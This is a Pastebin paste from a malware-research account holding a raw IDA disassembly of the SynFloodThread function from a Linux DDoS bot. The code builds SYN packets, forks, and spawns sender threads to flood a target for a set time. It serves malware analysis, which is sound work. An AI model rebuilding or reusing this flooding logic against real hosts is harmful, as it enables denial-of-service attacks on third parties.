API tools faq
paste
Advertisement
MalwareMustDie

SYN Flood Thread | China DDoSer

MalwareMustDie
Jun 16th, 2014
2,636
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 18.29 KB | None | 0 0
raw download clone embed print report
  1. ; SYN Flood thread #MalwareMustDie - @unixfreaxjp /malware/Iptablex]$ date
  2. ; Mon Jun 16 14:08:15 JST 2014
  3.  
  4. .text:08048A00                 public SynFloodThread
  5. .text:08048A00 SynFloodThread  proc near
  6. .text:08048A00 var_88          = dword ptr -88h
  7. .text:08048A00 var_84          = dword ptr -84h
  8. .text:08048A00 var_80          = dword ptr -80h
  9. .text:08048A00 var_7C          = dword ptr -7Ch
  10. .text:08048A00 var_78          = dword ptr -78h
  11. .text:08048A00 var_74          = dword ptr -74h
  12. .text:08048A00 var_70          = dword ptr -70h
  13. .text:08048A00 var_6C          = dword ptr -6Ch
  14. .text:08048A00 var_68          = dword ptr -68h
  15. .text:08048A00 var_60          = dword ptr -60h
  16. .text:08048A00 var_5C          = dword ptr -5Ch
  17. .text:08048A00 var_58          = dword ptr -58h
  18. .text:08048A00 var_52          = word ptr -52h
  19. .text:08048A00 var_50          = dword ptr -50h
  20. .text:08048A00 var_4C          = dword ptr -4Ch
  21. .text:08048A00 var_44          = byte ptr -44h
  22. .text:08048A00 var_40          = dword ptr -40h
  23. .text:08048A00 var_3C          = word ptr -3Ch
  24. .text:08048A00 var_3A          = word ptr -3Ah
  25. .text:08048A00 var_38          = dword ptr -38h
  26. .text:08048A00 var_34          = word ptr -34h
  27. .text:08048A00 var_30          = dword ptr -30h
  28. .text:08048A00 var_24          = dword ptr -24h
  29. .text:08048A00 var_20          = dword ptr -20h
  30. .text:08048A00 var_1C          = dword ptr -1Ch
  31. .text:08048A00 var_18          = dword ptr -18h
  32. .text:08048A00 var_14          = dword ptr -14h
  33. .text:08048A00 var_10          = byte ptr -10h
  34. .text:08048A00 arg_0           = dword ptr  8
  35. .text:08048A00
  36. .text:08048A00                 push    ebp
  37. .text:08048A01                 mov     ebp, esp
  38. .text:08048A03                 push    edi
  39. .text:08048A04                 push    esi
  40. .text:08048A05                 push    ebx
  41. .text:08048A06                 sub     esp, 7Ch        ; fd
  42. .text:08048A09                 mov     esi, [ebp+arg_0]
  43. .text:08048A0C                 lea     eax, [ebp+var_6C]
  44. .text:08048A0F                 mov     [esp+88h+var_80], 60h
  45. .text:08048A17                 mov     [esp+88h+var_84], 0
  46. .text:08048A1F                 mov     [esp+88h+var_88], eax
  47. .text:08048A22                 call    memset
  48. .text:08048A27                 mov     eax, [esi]
  49. .text:08048A29                 mov     [ebp+var_38], eax
  50. .text:08048A2C                 mov     eax, [esi+4]
  51. .text:08048A2F                 mov     edi, [esi+0Ch]
  52. .text:08048A32                 mov     ebx, [esi+64h]
  53. .text:08048A35                 mov     [esp+88h+var_88], 0
  54. .text:08048A3C                 mov     [ebp+var_34], ax
  55. .text:08048A40                 mov     [ebp+var_52], di
  56. .text:08048A44                 call    time
  57. .text:08048A49                 lea     edx, [esi+50h]
  58. .text:08048A4C                 mov     [ebp+var_60], eax
  59. .text:08048A4F                 mov     ecx, [esi+60h]
  60. .text:08048A52                 mov     [ebp+var_44], 0
  61. .text:08048A56                 mov     [ebp+var_5C], ecx
  62. .text:08048A59                 mov     eax, [esi+50h]
  63. .text:08048A5C                 mov     [ebp+var_20], eax
  64. .text:08048A5F                 mov     eax, [edx+4]
  65. .text:08048A62                 mov     [ebp+var_1C], eax
  66. .text:08048A65                 mov     eax, [edx+8]
  67. .text:08048A68                 mov     [ebp+var_18], eax
  68. .text:08048A6B                 mov     eax, [edx+0Ch]
  69. .text:08048A6E                 mov     [ebp+var_14], eax
  70. .text:08048A71                 test    byte ptr [esi+8], 4
  71. .text:08048A75                 jnz     loc_8048B60
  72. .text:08048A7B                 cmp     ebx, ecx
  73. .text:08048A7D                 ja      loc_8048B48
  74. .text:08048A83
  75. .text:08048A83 loc_8048A83:
  76. .text:08048A83                 mov     eax, dword ptr ds:g_mainsrvinfo+10h
  77. .text:08048A88                 mov     [esp+88h+var_88], eax
  78. .text:08048A8B                 call    GetSocketIp
  79. .text:08048A90                 mov     [ebp+var_58], 0
  80. .text:08048A97                 ror     ax, 8
  81. .text:08048A9B                 ror     eax, 10h
  82. .text:08048A9E                 ror     ax, 8
  83. .text:08048AA2                 mov     [ebp+var_5C], eax
  84. .text:08048AA5
  85. .text:08048AA5 loc_8048AA5:
  86. .text:08048AA5                 mov     eax, [ebp+var_58]
  87. .text:08048AA8                 mov     ebx, [esi+68h]
  88. .text:08048AAB                 mov     [esp+88h+var_88], 0
  89. .text:08048AB2                 mov     [ebp+var_70], eax
  90. .text:08048AB5                 call    time
  91. .text:08048ABA                 lea     ebx, [ebx+eax+2]
  92. .text:08048ABE                 movzx   eax, word ptr [esi+6Ch]
  93. .text:08048AC2                 mov     [ebp+var_40], ebx
  94. .text:08048AC5                 mov     [ebp+var_3C], ax
  95. .text:08048AC9                 movzx   eax, word ptr [esi+6Eh]
  96. .text:08048ACD                 mov     [ebp+var_3A], ax
  97. .text:08048AD1                 lea     eax, [ebp+var_6C]
  98. .text:08048AD4                 mov     [esi+80h], eax
  99. .text:08048ADA                 lea     eax, [esi+78h]
  100. .text:08048ADD                 mov     [esp+88h+var_7C], eax
  101. .text:08048AE1                 mov     [esp+88h+var_80], 0
  102. .text:08048AE9                 mov     [esp+88h+var_84], 1
  103. .text:08048AF1                 mov     [esp+88h+var_88], 1
  104. .text:08048AF8                 call    socketpair
  105. .text:08048AFD                 test    eax, eax
  106. .text:08048AFF                 jnz     short loc_8048B3C
  107. .text:08048B01                 call    fork
  108. .text:08048B06                 cmp     eax, 0
  109. .text:08048B09                 jz      short loc_8048B75
  110. .text:08048B0B                 nop
  111. .text:08048B0C                 lea     esi, [esi+0]
  112. .text:08048B10                 jle     loc_8048E6A
  113. .text:08048B16                 mov     [esi+74h], eax
  114. .text:08048B19                 mov     [esp+88h+var_80], 0
  115. .text:08048B21                 mov     [esp+88h+var_84], 0
  116. .text:08048B29                 mov     [esp+88h+var_88], eax
  117. .text:08048B2C                 call    waitpid
  118. .text:08048B31                 lea     eax, [ebp+var_20]
  119. .text:08048B34                 mov     [esp+88h+var_88], eax
  120. .text:08048B37                 call    DeleteTask
  121. .text:08048B3C
  122. .text:08048B3C loc_8048B3C:
  123. .text:08048B3C                 mov     [esp+88h+var_88], 0
  124. .text:08048B43                 call    pthread_exit
  125. .text:08048B48
  126. .text:08048B48 loc_8048B48:
  127. .text:08048B48                 mov     eax, dword ptr ds:g_mainsrvinfo+128h
  128. .text:08048B4D                 cmp     ecx, eax
  129. .text:08048B4F                 jnb     short loc_8048B54
  130. .text:08048B51                 mov     [ebp+var_5C], eax
  131. .text:08048B54
  132. .text:08048B54 loc_8048B54:
  133. .text:08048B54                 mov     eax, dword ptr ds:g_mainsrvinfo+12Ch
  134. .text:08048B59                 cmp     ebx, eax
  135. .text:08048B5B                 jbe     short loc_8048B60
  136. .text:08048B5D                 mov     ebx, eax
  137. .text:08048B5F                 nop
  138. .text:08048B60
  139. .text:08048B60 loc_8048B60:
  140. .text:08048B60                 mov     eax, [ebp+var_5C]
  141. .text:08048B63                 cmp     ebx, eax
  142. .text:08048B65                 jbe     loc_8048A83
  143. .text:08048B6B                 sub     ebx, eax
  144. .text:08048B6D                 mov     [ebp+var_58], ebx
  145. .text:08048B70                 jmp     loc_8048AA5
  146. .text:08048B75
  147. .text:08048B75 loc_8048B75:
  148. .text:08048B75                 lea     eax, [ebp+var_6C]
  149. .text:08048B78                 mov     ds:rmsg, eax
  150. .text:08048B7D                 mov     [esp+88h+var_84], offset stopatk
  151. .text:08048B85                 mov     [esp+88h+var_88], 0E8h
  152. .text:08048B8C                 call    ssignal
  153. .text:08048B91                 mov     eax, [esi+7Ch]
  154. .text:08048B94                 mov     [esp+88h+var_88], eax
  155. .text:08048B97                 call    close
  156. .text:08048B9C                 movzx   eax, [ebp+var_52]
  157. .text:08048BA0                 mov     [ebp+var_50], 0
  158. .text:08048BA7                 mov     [ebp+var_6C], 0
  159. .text:08048BAE                 mov     [ebp+var_68], 0
  160. .text:08048BB5                 imul    ebx, eax, 1389h
  161. .text:08048BBB                 mov     [esp+88h+var_88], ebx
  162. .text:08048BBE                 call    malloc
  163. .text:08048BC3                 mov     [esp+88h+var_88], ebx
  164. .text:08048BC6                 mov     [ebp+var_6C], eax
  165. .text:08048BC9                 call    malloc
  166. .text:08048BCE                 mov     edx, [ebp+var_6C]
  167. .text:08048BD1                 test    edx, edx
  168. .text:08048BD3                 mov     [ebp+var_68], eax
  169. .text:08048BD6                 jz      loc_8048E45
  170. .text:08048BDC                 test    eax, eax
  171. .text:08048BDE                 jz      loc_8048E3D
  172. .text:08048BE4                 mov     [esp+88h+var_80], ebx
  173. .text:08048BE8                 shr     edi, 10h
  174. .text:08048BEB                 mov     [esp+88h+var_88], edx
  175. .text:08048BEE                 and     edi, 0FFh
  176. .text:08048BF4                 mov     [esp+88h+var_84], 0
  177. .text:08048BFC                 call    memset
  178. .text:08048C01                 mov     eax, [ebp+var_68]
  179. .text:08048C04                 mov     [esp+88h+var_80], ebx
  180. .text:08048C08                 xor     ebx, ebx
  181. .text:08048C0A                 mov     [esp+88h+var_84], 0
  182. .text:08048C12                 mov     [esp+88h+var_88], eax
  183. .text:08048C15                 call    memset
  184. .text:08048C1A                 lea     esi, [esi+0]
  185. .text:08048C20 loc_8048C20:
  186. .text:08048C20                 movzx   edx, [ebp+var_52]
  187. .text:08048C24                 movzx   eax, [ebp+var_34]
  188. .text:08048C28                 mov     [esp+88h+var_74], 0
  189. .text:08048C30                 mov     [esp+88h+var_80], edi
  190. .text:08048C34                 mov     [esp+88h+var_84], edx
  191. .text:08048C38                 imul    edx, ebx
  192. .text:08048C3B                 mov     [esp+88h+var_78], eax
  193. .text:08048C3F                 mov     eax, [ebp+var_38]
  194. .text:08048C42                 add     edx, [ebp+var_6C]
  195. .text:08048C45                 mov     [esp+88h+var_7C], eax
  196. .text:08048C49                 mov     [esp+88h+var_88], edx
  197. .text:08048C4C                 call    syn_packet
  198. .text:08048C51                 movzx   edx, [ebp+var_52]
  199. .text:08048C55                 movzx   eax, [ebp+var_34]
  200. .text:08048C59                 mov     [esp+88h+var_74], 0
  201. .text:08048C61                 mov     [esp+88h+var_80], edi
  202. .text:08048C65                 mov     [esp+88h+var_84], edx
  203. .text:08048C69                 imul    edx, ebx
  204. .text:08048C6C                 mov     [esp+88h+var_78], eax
  205. .text:08048C70                 mov     eax, [ebp+var_38]
  206. .text:08048C73                 add     edx, [ebp+var_68]
  207. .text:08048C76                 mov     [esp+88h+var_7C], eax
  208. .text:08048C7A                 mov     [esp+88h+var_88], edx
  209. .text:08048C7D                 call    syn_packet
  210. .text:08048C82                 mov     eax, [ebp+var_58]
  211. .text:08048C85                 cmp     eax, 1
  212. .text:08048C88                 jbe     short loc_8048C95
  213. .text:08048C8A                 mov     [esp+88h+var_88], eax
  214. .text:08048C8D                 call    Hbrand
  215. .text:08048C92                 mov     [ebp+var_70], eax
  216. .text:08048C95
  217. .text:08048C95 loc_8048C95:
  218. .text:08048C95                 movzx   edx, [ebp+var_52]
  219. .text:08048C99                 mov     eax, [ebp+var_70]
  220. .text:08048C9C                 add     eax, [ebp+var_5C]
  221. .text:08048C9F                 mov     [esp+88h+var_7C], 0
  222. .text:08048CA7                 mov     [esp+88h+var_84], edx
  223. .text:08048CAB                 imul    edx, ebx
  224. .text:08048CAE                 add     ebx, 1
  225. .text:08048CB1                 add     edx, [ebp+var_6C]
  226. .text:08048CB4                 ror     ax, 8
  227. .text:08048CB8                 ror     eax, 10h
  228. .text:08048CBB                 ror     ax, 8
  229. .text:08048CBF                 mov     [esp+88h+var_80], eax
  230. .text:08048CC3                 mov     [esp+88h+var_88], edx
  231. .text:08048CC6                 call    ChangeSyn
  232. .text:08048CCB                 cmp     ebx, 1388h
  233. .text:08048CD1                 jnz     loc_8048C20
  234. .text:08048CD7                 mov     eax, [ebp+var_6C]
  235. .text:08048CDA                 lea     ebx, [ebp+var_30]
  236. .text:08048CDD                 mov     [ebp+var_10], 1
  237. .text:08048CE1                 lea     edi, [ebp+var_24]
  238. .text:08048CE4                 mov     [ebp+var_4C], eax
  239. .text:08048CE7
  240. .text:08048CE7 loc_8048CE7:
  241. .text:08048CE7                 mov     [esp+88h+var_88], 2710h
  242. .text:08048CEE                 call    usleep
  243. .text:08048CF3                 lea     eax, [ebp+var_6C]
  244. .text:08048CF6                 mov     [esp+88h+var_80], ebx
  245. .text:08048CFA                 add     ebx, 4
  246. .text:08048CFD                 mov     [esp+88h+var_78], 1
  247. .text:08048D05                 mov     [esp+88h+var_7C], 0
  248. .text:08048D0D                 mov     [esp+88h+var_84], eax
  249. .text:08048D11                 mov     [esp+88h+var_88], offset SynFloodSendThread
  250. .text:08048D18                 call    HbCreateThread
  251. .text:08048D1D                 cmp     ebx, edi
  252. .text:08048D1F                 jnz     short loc_8048CE7
  253. .text:08048D21                 mov     [esp+88h+var_88], 4E20h
  254. .text:08048D28                 call    usleep
  255. .text:08048D2D                 lea     eax, [ebp+var_6C]
  256. .text:08048D30                 mov     [esp+88h+var_78], 1
  257. .text:08048D38                 mov     [esp+88h+var_7C], 1
  258. .text:08048D40                 mov     [esp+88h+var_80], ebx
  259. .text:08048D44                 mov     [esp+88h+var_84], eax
  260. .text:08048D48                 mov     [esp+88h+var_88], offset SynFloodBuildThread
  261. .text:08048D4F                 call    HbCreateThread
  262. .text:08048D54                 cmp     [ebp+var_10], 1
  263. .text:08048D58                 jz      short loc_8048D92
  264. .text:08048D5A                 jmp     short loc_8048DA5
  265. .text:08048D5C                 align 10h
  266. .text:08048D60 loc_8048D60:
  267. .text:08048D60                 movzx   eax, [ebp+var_3C]
  268. .text:08048D64                 imul    eax, 0F4240h
  269. .text:08048D6A                 mov     [esp+88h+var_88], eax
  270. .text:08048D6D                 call    usleep
  271. .text:08048D72                 movzx   eax, [ebp+var_3A]
  272. .text:08048D76                 mov     [ebp+var_44], 1
  273. .text:08048D7A                 imul    eax, 0F4240h
  274. .text:08048D80                 mov     [esp+88h+var_88], eax
  275. .text:08048D83                 call    usleep
  276. .text:08048D88                 cmp     [ebp+var_10], 1
  277. .text:08048D8C                 mov     [ebp+var_44], 0
  278. .text:08048D90                 jnz     short loc_8048DA5
  279. .text:08048D92
  280. .text:08048D92 loc_8048D92:
  281. .text:08048D92                 mov     ebx, [ebp+var_40]
  282. .text:08048D95                 mov     [esp+88h+var_88], 0
  283. .text:08048D9C                 call    time
  284. .text:08048DA1                 cmp     ebx, eax
  285. .text:08048DA3                 jg      short loc_8048D60
  286. .text:08048DA5
  287. .text:08048DA5 loc_8048DA5:
  288. .text:08048DA5                 mov     [ebp+var_10], 0
  289. .text:08048DA9                 xor     edi, edi
  290. .text:08048DAB                 xor     ebx, ebx
  291. .text:08048DAD                 mov     [esp+88h+var_88], 186A0h
  292. .text:08048DB4                 call    usleep
  293. .text:08048DB9
  294. .text:08048DB9 loc_8048DB9:
  295. .text:08048DB9                 mov     eax, [ebp+ebx*4+var_30]
  296. .text:08048DBD                 mov     [esp+88h+var_84], 64h
  297. .text:08048DC5                 mov     [esp+88h+var_88], eax
  298. .text:08048DC8                 call    HbCheckThread
  299. .text:08048DCD                 test    eax, eax
  300. .text:08048DCF                 jz      short loc_8048DDA
  301. .text:08048DD1                 cmp     edi, 1Dh
  302. .text:08048DD4                 jbe     loc_8048E76
  303. .text:08048DDA
  304. .text:08048DDA loc_8048DDA:
  305. .text:08048DDA                 add     ebx, 1
  306. .text:08048DDD                 cmp     ebx, 2
  307. .text:08048DE0                 jg      short loc_8048DE6
  308. .text:08048DE2                 xor     edi, edi
  309. .text:08048DE4                 jmp     short loc_8048DB9
  310. .text:08048DE6
  311. .text:08048DE6 loc_8048DE6:
  312. .text:08048DE6                 xor     ebx, ebx
  313. .text:08048DE8
  314. .text:08048DE8 loc_8048DE8:
  315. .text:08048DE8                 mov     eax, [ebp+ebx*4+var_30]
  316. .text:08048DEC                 add     ebx, 1
  317. .text:08048DEF                 mov     [esp+88h+var_88], eax
  318. .text:08048DF2                 call    HbExitThread
  319. .text:08048DF7                 cmp     ebx, 3
  320. .text:08048DFA                 jnz     short loc_8048DE8
  321. .text:08048DFC                 xor     bl, bl
  322. .text:08048DFE                 jmp     short loc_8048E14
  323. .text:08048E00 loc_8048E00:
  324. .text:08048E00                 cmp     ebx, 1Eh
  325. .text:08048E03                 jz      short loc_8048E2B
  326. .text:08048E05                 add     ebx, 1
  327. .text:08048E08                 mov     [esp+88h+var_88], 186A0h
  328. .text:08048E0F                 call    usleep
  329. .text:08048E14 loc_8048E14:
  330. .text:08048E14                 mov     eax, [ebp+var_24]
  331. .text:08048E17                 mov     [esp+88h+var_84], 64h
  332. .text:08048E1F                 mov     [esp+88h+var_88], eax
  333. .text:08048E22                 call    HbCheckThread
  334. .text:08048E27                 test    eax, eax
  335. .text:08048E29                 jnz     short loc_8048E00
  336. .text:08048E2B loc_8048E2B:
  337. .text:08048E2B                 mov     eax, [ebp+var_24]
  338. .text:08048E2E                 mov     [esp+88h+var_88], eax
  339. .text:08048E31                 call    HbExitThread
  340. .text:08048E36                 mov     edx, [ebp+var_6C]
  341. .text:08048E39                 test    edx, edx
  342. .text:08048E3B                 jz      short loc_8048E45
  343. .text:08048E3D
  344. .text:08048E3D loc_8048E3D:
  345. .text:08048E3D                 mov     [esp+88h+var_88], edx
  346. .text:08048E40                 call    free
  347. .text:08048E45
  348. .text:08048E45 loc_8048E45:
  349. .text:08048E45                 mov     eax, [ebp+var_68]
  350. .text:08048E48                 test    eax, eax
  351. .text:08048E4A                 jz      short loc_8048E54
  352. .text:08048E4C                 mov     [esp+88h+var_88], eax
  353. .text:08048E4F                 call    free
  354. .text:08048E54
  355. .text:08048E54 loc_8048E54:
  356. .text:08048E54                 mov     dword ptr [esi+80h], 0
  357. .text:08048E5E                 mov     [esp+88h+var_88], 0
  358. .text:08048E65                 call    exit
  359. .text:08048E6A loc_8048E6A:
  360. .text:08048E6A                 mov     [esp+88h+var_88], 0
  361. .text:08048E71                 call    exit
  362. .text:08048E76
  363. .text:08048E76 loc_8048E76:
  364. .text:08048E76                 add     edi, 1
  365. .text:08048E79                 mov     [esp+88h+var_88], 186A0h
  366. .text:08048E80                 call    usleep
  367. .text:08048E85                 jmp     loc_8048DB9
  368. .text:08048E85 SynFloodThread  endp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!